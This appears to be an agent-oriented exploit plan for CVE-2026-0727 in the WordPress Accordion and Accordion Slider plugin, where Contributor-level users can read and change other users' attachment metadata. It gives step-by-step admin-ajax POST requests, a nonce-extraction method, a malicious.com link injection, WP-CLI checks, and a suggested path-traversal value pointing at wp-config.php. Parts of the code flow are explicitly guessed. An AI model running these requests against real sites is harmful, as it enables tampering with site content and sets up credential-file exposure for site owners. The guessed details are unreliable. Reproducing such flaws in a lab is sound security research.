Accordion and Accordion Slider <= 1.4.5 - Missing Authorization to Authenticated (Contributor+) Attachment Metadata Modification

This research plan focuses on exploiting CVE-2026-0727, a missing authorization vulnerability in the Accordion and Accordion Slider plugin for WordPress. This vulnerability allows any authenticated user with at least Contributor-level permissions to read and modify metadata for any attachment on the site.

---

1. Vulnerability Summary

• ID: CVE-2026-0727
• Plugin: Accordion and Accordion Slider (slug: accordion-and-accordion-slider)
• Vulnerable Versions: <= 1.4.5
• Vulnerable Functions: wp_aas_save_attachment_data and wp_aas_get_attachment_edit_form
• Vulnerability Type: Missing Authorization (Broken Access Control)
• Impact: Authenticated attackers (Contributor+) can read and update metadata for any media attachment. Crucially, the description mentions "file paths," implying that an attacker might be able to modify the _wp_attached_file meta key or other sensitive fields.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Actions:
  1. wp_aas_get_attachment_edit_form (Read Metadata)
  2. wp_aas_save_attachment_data (Modify Metadata)
• Parameters:
  • attachment_id (The ID of the media file to target)
  • aas_attachment_data or similar (POST data containing the new metadata)
• Authentication: Authenticated (Contributor+)
• Preconditions: An attachment exists on the site (ideally one the attacker does not own).

3. Code Flow (Inferred)

1. Registration: The plugin registers AJAX handlers for wp_ajax_wp_aas_save_attachment_data and wp_ajax_wp_aas_get_attachment_edit_form.
2. Lack of Capability Check: Inside these functions, there is no call to current_user_can('edit_others_posts') or similar checks to verify if the user is authorized to modify the specific attachment ID provided.
3. Lack of Ownership Check: The functions likely do not check if the post_author of the attachment matches the current user ID.
4. Processing:
   • wp_aas_get_attachment_edit_form: Takes a post_id, fetches metadata, and returns it.
   • wp_aas_save_attachment_data: Takes a post_id and an array of metadata, then calls update_post_meta() or wp_update_post().

4. Nonce Acquisition Strategy

The plugin likely uses a nonce for these AJAX actions. Based on standard WordPress patterns for this plugin:

1. Location: The nonce is likely localized in the WordPress admin or on a page where the Accordion editor is active.
2. Script Handle: Likely wp-aas-admin-js or similar.
3. Discovery & Extraction:
   • The agent should create a post or accordion as the contributor to see if the nonce is available in the admin context.
   • Search for wp_localize_script in the plugin code to find the JS variable name.
   • Inferred JS Variable: wp_aas_ajax?.nonce or wp_aas_data?.nonce.
   • Action to find nonce:

     grep -r "wp_create_nonce" .
     

   • Browser Extraction:

     // Once the editor is loaded:
     browser_eval("window.wp_aas_ajax_object?.nonce")
     

5. Exploitation Strategy

Step 1: Read Attachment Metadata

The first goal is to prove we can read metadata for an attachment we don't own (e.g., an Admin's upload).

• HTTP Tool: http_request
• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Body (URL-Encoded):
  • action=wp_aas_get_attachment_edit_form
  • attachment_id=[TARGET_ATTACHMENT_ID]
  • security=[NONCE]
• Expected Response: A JSON object or HTML snippet containing the title, caption, alt text, and custom link for the attachment.

Step 2: Modify Attachment Metadata

Modify the metadata of the same target attachment.

• HTTP Tool: http_request
• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Body (URL-Encoded):
  • action=wp_aas_save_attachment_data
  • attachment_id=[TARGET_ATTACHMENT_ID]
  • security=[NONCE]
  • aas_attachment_data[title]=Exploited Title
  • aas_attachment_data[alt]=Exploited Alt
  • aas_attachment_data[custom_link]=https://malicious.com
• Expected Response: Success status (e.g., {"success":true}).

6. Test Data Setup

1. Administrator: Log in as admin and upload an image (e.g., test.jpg). Record the Attachment ID (e.g., ID: 10).
2. Contributor: Create a user with the contributor role.
3. Page/Accordion: (If necessary to get the nonce) Use the Contributor to create a simple Accordion.
4. Shortcode: If the nonce only loads on the frontend with a shortcode:

   wp post create --post_type=page --post_status=publish --post_content='[aas_accordion id="123"]'
   

7. Expected Results

• Read: The response from wp_aas_get_attachment_edit_form should return the private metadata of the attachment belonging to the Admin.
• Update: The response from wp_aas_save_attachment_data should confirm the update.
• Verification: Subsequent checks of the attachment via WP-CLI or the UI should show the changed "Exploited Title" and "Exploited Alt."

8. Verification Steps

After running the exploit, use WP-CLI to confirm the metadata was actually changed in the database:

# Check the title/caption (post table)
wp post get [TARGET_ATTACHMENT_ID] --field=post_title

# Check the alt text (postmeta table)
wp post meta get [TARGET_ATTACHMENT_ID] _wp_attachment_image_alt

# Check the plugin-specific custom link (postmeta table)
wp post meta list [TARGET_ATTACHMENT_ID]

9. Alternative Approaches

• Path Traversal: If the aas_attachment_data allows updating _wp_attached_file, attempt to set it to sensitive system files like ../../../../wp-config.php. While it won't give immediate LFI, it could potentially be used in combination with other plugin features that process the "attached file" path.
• Batch Update: Check if attachment_id accepts an array for bulk modification.
• Blind Modification: If the "Get Form" action is protected but "Save Data" is not, perform a blind update and verify via the frontend media library.